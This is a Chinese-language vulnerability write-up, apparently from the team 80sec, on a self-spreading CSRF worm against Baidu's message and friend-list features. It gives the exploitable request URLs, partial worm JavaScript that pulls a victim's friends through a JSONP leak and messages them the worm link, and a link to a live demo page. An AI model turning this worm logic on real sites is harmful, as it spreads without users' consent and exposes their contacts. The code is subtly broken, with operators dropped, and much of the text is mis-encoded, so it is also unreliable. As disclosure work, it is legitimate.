百度Hi Csrf蠕蟲攻擊

漏洞起因:百度是國(guó)內(nèi)最大的中文搜索引擎。同時(shí)百度也提供了百度空間、百度貼吧等BLOG社區(qū)服務(wù),擁有海量的用戶群,號(hào)稱全球最大中文社區(qū)。80sec發(fā)現(xiàn)過百度產(chǎn)品一系列的安全漏洞,其中一些問題得到了有效的修補(bǔ),但是百度的產(chǎn)品仍然存在很多嚴(yán)重的安全漏洞,利用這些漏洞黑客可以制作Web蠕蟲,影響百度所有的用戶。
CSRF worm技術(shù)分析:
一. 百度用戶中心短消息功能存在CSRF漏洞
百度用戶中心短消息功能和百度空間、百度貼吧等產(chǎn)品相互關(guān)聯(lián),用戶可以給指定百度ID用戶發(fā)送短消息,在百度空間用互為好友的情況下,發(fā)送短消息將沒有任何限制,同時(shí)由于百度程序員在實(shí)現(xiàn)短消息功能時(shí)使用了$_REQUEST類變量傳參,給黑客利用CSRF漏洞進(jìn)行攻擊提供了很大的方便。百度用戶中心短消息功能的請(qǐng)求參數(shù)能夠被完全預(yù)測(cè),只需要指定sn參數(shù)為發(fā)送消息的用戶,co參數(shù)為消息內(nèi)容,就可以成功發(fā)送短消息,如下:
http://msg.baidu.com/?ct=22&cm=MailSend&tn=bmSubmit&sn=用戶賬號(hào)&co=消息內(nèi)容
該漏洞在07年被應(yīng)用于80SEC測(cè)試的百度XSS WORM中,至今尚未修補(bǔ)。
二. 百度空間好友json數(shù)據(jù)泄露問題
百度空間的好友功能數(shù)據(jù)是使用json格式實(shí)現(xiàn)的,此接口沒有做任何的安全限制,只需將un參數(shù)設(shè)定為任意用戶賬號(hào),就可以獲得指定用戶的百度好友數(shù)據(jù),如下
http://frd.baidu.com/?ct=28&un=用戶賬號(hào)&cm=FriList&tn=bmABCFriList&callback=gotfriends
該漏洞可以直接被Javascript攔截技術(shù)利用,獲取用戶的好友信息.
三. 百度認(rèn)證問題
web攻擊不可避免地依賴于系統(tǒng)的認(rèn)證,而在百度的認(rèn)證系統(tǒng)里,所有認(rèn)證基于SESSION,這樣在IE里就不會(huì)被IE的隱私策略阻止,會(huì)話認(rèn)證信息每次都會(huì)被發(fā)送出去,為我們?nèi)湎x的傳播提供了必要的條件。
四. CSRF JavaScript_Hijacking Session Auth= CSRF worm
CSRF攻擊結(jié)合Javascript攔截技術(shù)完全可以實(shí)現(xiàn)CSRF worm,百度產(chǎn)品的這兩個(gè)安全問題為實(shí)現(xiàn)Web蠕蟲提供了所有的條件,80Sec團(tuán)隊(duì)已經(jīng)編寫出一只完整的百度csrf蠕蟲,這是一只完全由客戶端腳本實(shí)現(xiàn)的CSRF蠕蟲,這只蠕蟲實(shí)際上只有一條鏈接,受害者點(diǎn)擊這條鏈接后,將會(huì)自動(dòng)把這條鏈接通過短消息功能傳給受害者所有的好友,因?yàn)榘俣扔脩艋鶖?shù)很大,所以蠕蟲的傳播速度將會(huì)呈幾何級(jí)成長(zhǎng),下面對(duì)csrf蠕蟲部分代碼進(jìn)行分析:
1. 模擬服務(wù)端取得request的參數(shù)
var lsURL=window.location.href;
loU = lsURL.split(”?”);
if (loU.length>1)
{
var loallPm = loU[1].split(”&”);
省略…………….
定義蠕蟲頁(yè)面服務(wù)器地址,取得?和&符號(hào)后的字符串,從URL中提取得感染蠕蟲的用戶名和感染蠕蟲者的好友用戶名。
2. 好友json數(shù)據(jù)的動(dòng)態(tài)獲取
var gotfriends = function (x)
{
for(i=0;i<x[2].length;i )
{
friends.push(x[2][i][1]);
}
}
loadjson(’<script src=”http://frd.baidu.com/?ct=28&un=’ lusername ’&cm=FriList&tn=bmABCFriList&callback=gotfriends&.tmp=&1=2″><\/script>’);
通過CSRF漏洞從遠(yuǎn)程加載受害者的好友json數(shù)據(jù),根據(jù)該接口的json數(shù)據(jù)格式,提取好友數(shù)據(jù)為蠕蟲的傳播流程做準(zhǔn)備。
3. 感染信息輸出和消息發(fā)送的核心部分
evilurl=url ”/wish.php?from=” lusername ”&to=”;
sendmsg=”http://msg.baidu.com/?ct=22&cm=MailSend&tn=bmSubmit&sn=[user]&co=[evilmsg]”
for(i=0;i<friends.length;i ){
省略…………….
mysendmsg=mysendmsg ”&” i;
eval(’x' i ’=new Image();x’ i ’.src=unescape(”‘ mysendmsg ’”);’);
省略…………….
整個(gè)蠕蟲最核心的部分,按照蠕蟲感染的邏輯,將感染者用戶名和需要傳播的好友用戶名放到蠕蟲鏈接內(nèi),最后輸出短消息內(nèi)容,使用一個(gè)FOR循環(huán)結(jié)構(gòu)歷遍所有好友數(shù)據(jù),通過圖片文件請(qǐng)求向所有的好友發(fā)送感染鏈接信息。
4. 注意細(xì)節(jié)
由于需要?jiǎng)討B(tài)加載json數(shù)據(jù)運(yùn)行,所以必須注意各個(gè)函數(shù)執(zhí)行的先后順序,否則json數(shù)據(jù)還未加載完畢,蠕蟲核心部分的流程將跑不起來。
5. CSRF Worm DEMO頁(yè)
這里我們提供了一個(gè)百度CSRF Worm DEMO頁(yè)僅供大家進(jìn)行安全測(cè)試,非安全測(cè)試的其他行為,80SEC將不負(fù)任何責(zé)任。測(cè)試方法:
將to參數(shù)設(shè)置為自己的用戶名,登陸百度后點(diǎn)擊鏈接或直接進(jìn)入頁(yè)面
http://www.80sec.com/wish.php?to=自己的百度用戶名
五 CSRF worm安全提醒:
除開百度,國(guó)內(nèi)的社區(qū)類、Web2.0類網(wǎng)站如校內(nèi)網(wǎng)、Myspace、飯否等都存在這類安全問題,黑客可以直接通過CSRF攻擊配合各種功能應(yīng)用針對(duì)網(wǎng)站進(jìn)行CSRF worm攻擊,網(wǎng)站可以參考http://www.80sec.com/csrf-securit.html文檔中的安全提醒做進(jìn)一步的防范。
百度Hi Csrf蠕蟲攻擊:http://www.80sec.com/baidu-hi-scrf-worm-attac.html
相關(guān)文章
封UDP的服務(wù)器真的打不了么?封UDP、封海外服務(wù)器
很多游戲服務(wù)器租用的時(shí)候會(huì)出現(xiàn)一些封UDP的字眼,網(wǎng)上一些文章也說UDP協(xié)議不可靠!為什么要封UDP呢?既然不可靠,為什么有些人還要使用它呢?今天與你們分享一下UDP,希望2024-05-07魔獸世界服務(wù)器被DDoS攻擊怎么辦?DDoS攻擊防御方法
魔獸世界服務(wù)器被攻擊在目前來說也是比較常見的,同行競(jìng)爭(zhēng)激烈,在官服開放時(shí)也遇到過DDOS攻擊,要是飛飛沒記錯(cuò)是在22年9月14日,從剛開始的身份驗(yàn)證服務(wù)器出現(xiàn)問題,到確2023-07-17分享五大免費(fèi)企業(yè)網(wǎng)絡(luò)入侵檢測(cè)(IDS)工具
這篇文章主要分享一下五大免費(fèi)企業(yè)網(wǎng)絡(luò)入侵檢測(cè)(IDS)工具,當(dāng)前企業(yè)對(duì)于網(wǎng)絡(luò)安全越來越重視,那么后期可能就需要大家多多關(guān)注一些安全工具的使用于檢測(cè)2019-12-01網(wǎng)絡(luò)安全基礎(chǔ)之網(wǎng)絡(luò)協(xié)議與安全威脅的關(guān)系介紹
網(wǎng)絡(luò)協(xié)議是什么呢?網(wǎng)絡(luò)協(xié)議是網(wǎng)絡(luò)中計(jì)算機(jī)或設(shè)備之間進(jìn)行通信的一系列規(guī)則集合。本文中小編介紹的是網(wǎng)絡(luò)協(xié)議和安全威脅的關(guān)系,需要的朋友不妨閱讀本文了解一下2019-04-02DDoS攻擊原理是什么?DDoS攻擊原理及防護(hù)措施介紹
DDoS攻擊是由DoS攻擊轉(zhuǎn)化的,這項(xiàng)攻擊的原理以及表現(xiàn)形式是怎樣的呢?要如何的進(jìn)行防御呢?本文中將會(huì)有詳細(xì)的介紹,需要的朋友不妨閱讀本文進(jìn)行參考2019-01-15基于Web攻擊的方式發(fā)現(xiàn)并攻擊物聯(lián)網(wǎng)設(shè)備介紹
本文中介紹的是基于Web攻擊的方式發(fā)現(xiàn)并攻擊物聯(lián)網(wǎng)設(shè)備,感興趣的朋友不妨閱讀本文進(jìn)行了解2019-01-11為何黑客要挾制路由器DNS 用戶該怎樣實(shí)時(shí)發(fā)覺和防備方法
起首說說挾制路由器是什么意思,路由器挾制平日指的是,開啟了無線網(wǎng)絡(luò)功效的無線路由器,攻擊者經(jīng)由過程破解無線暗碼銜接上無線網(wǎng)后,再登錄路由治理界面來節(jié)制全部無線網(wǎng)2018-05-16大勢(shì)至共享文件監(jiān)控軟件、共享文件權(quán)限管理軟件主控端與客戶端的連接設(shè)
這篇文章主要介紹了大勢(shì)至共享文件監(jiān)控軟件、共享文件權(quán)限管理軟件主控端與客戶端的連接設(shè)置方法詳解,,小編覺得還是挺不錯(cuò)的,具有一定借鑒價(jià)值,下面就來和小編一起看看2018-01-25詳細(xì)介紹sd卡加密軟件的選擇以及給sd卡設(shè)置密碼、給sd卡加密
這篇文章主要介紹了詳細(xì)介紹sd卡加密軟件的選擇以及給sd卡設(shè)置密碼、給sd卡加密,如何保護(hù)sd卡文件的安全,如何給SD卡設(shè)置密碼、如何給SD卡加密,下面就跟小編一起來看看吧2018-01-19server2008共享設(shè)置、服務(wù)器共享文件設(shè)置、服務(wù)器設(shè)置共享文件夾的方法
這篇文章主要介紹了server2008共享設(shè)置、服務(wù)器共享文件設(shè)置、服務(wù)器設(shè)置共享文件夾的方法詳細(xì)介紹,保護(hù)服務(wù)器共享文件設(shè)置訪問權(quán)限,讓每個(gè)部門只訪問自己的共享文件等,2018-01-19